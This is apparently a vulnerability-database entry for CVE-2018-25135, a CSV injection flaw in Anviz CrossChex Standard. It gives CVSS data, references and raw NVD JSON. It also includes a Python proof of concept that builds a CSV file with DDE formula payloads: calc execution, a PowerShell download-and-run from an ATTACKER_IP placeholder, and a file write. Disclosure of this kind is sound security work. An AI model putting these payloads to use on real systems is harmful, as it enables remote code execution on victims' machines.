CVE-2018-25135

Description

Anviz AIM CrossChex Standard 4.3.6.0 contains a CSV injection vulnerability that allows attackers to execute commands by inserting malicious formulas in user import fields. Attackers can craft payloads in fields like 'Name', 'Gender', or 'Position' to trigger Excel macro execution when importing user data.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Anviz AIM CrossChex Standard 4.3.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import csv
import sys

def generate_malicious_csv(filename):
    """
    PoC for CVE-2018-25135 CSV Injection in Anviz CrossChex Standard
    This demonstrates how malicious formulas can be injected via CSV import.
    """
    
    # Payload 1: Command execution via DDE
    # When opened in Excel, this will attempt to execute calc.exe
    dde_payload = "=cmd|' /C calc'!A0"
    
    # Payload 2: PowerShell reverse shell
    # Attacker should replace IP and PORT with actual values
    ps_payload = "=cmd|' /C powershell -c \"IEX(New-Object Net.WebClient).downloadstring('http://ATTACKER_IP/rev.ps1')\"'!A0"
    
    # Payload 3: File write operation
    file_write_payload = "=cmd|' /C echo malicious > C:\\temp\\pwned.txt'!A0"
    
    # Create malicious CSV with weaponized fields
    with open(filename, 'w', newline='', encoding='utf-8') as f:
        writer = csv.writer(f)
        # Header row
        writer.writerow(['Name', 'Gender', 'Position', 'Department', 'CardNumber'])
        # Malicious data rows
        writer.writerow([dde_payload, 'Male', 'IT Admin', 'Technology', '123456'])
        writer.writerow([ps_payload, 'Female', 'Manager', 'HR', '234567'])
        writer.writerow([file_write_payload, 'Male', 'Developer', 'Engineering', '345678'])
        # Normal looking rows mixed in
        writer.writerow(['John Smith', 'Male', 'Security', 'Security', '456789'])
        writer.writerow(['Jane Doe', 'Female', 'Analyst', 'Finance', '567890'])
    
    print(f"[+] Malicious CSV file created: {filename}")
    print(f"[!] When imported into CrossChex and opened in Excel, the formulas will be executed")
    return filename

if __name__ == '__main__':
    filename = sys.argv[1] if len(sys.argv) > 1 else 'malicious_users.csv'
    generate_malicious_csv(filename)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25135
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25135
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25135/
[4] VulDB https://vuldb.com/cve/CVE-2018-25135
[5] https://www.anviz.com
[6] https://www.exploit-db.com/exploits/45765
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php
[8] https://www.exploit-db.com/exploits/45765
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25135", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:47.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Anviz AIM CrossChex Standard 4.3.6.0 contains a CSV injection vulnerability that allows attackers to execute commands by inserting malicious formulas in user import fields. Attackers can craft payloads in fields like 'Name', 'Gender', or 'Position' to trigger Excel macro execution when importing user data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-149"}]}], "references": [{"url": "https://www.anviz.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45765", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45765", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}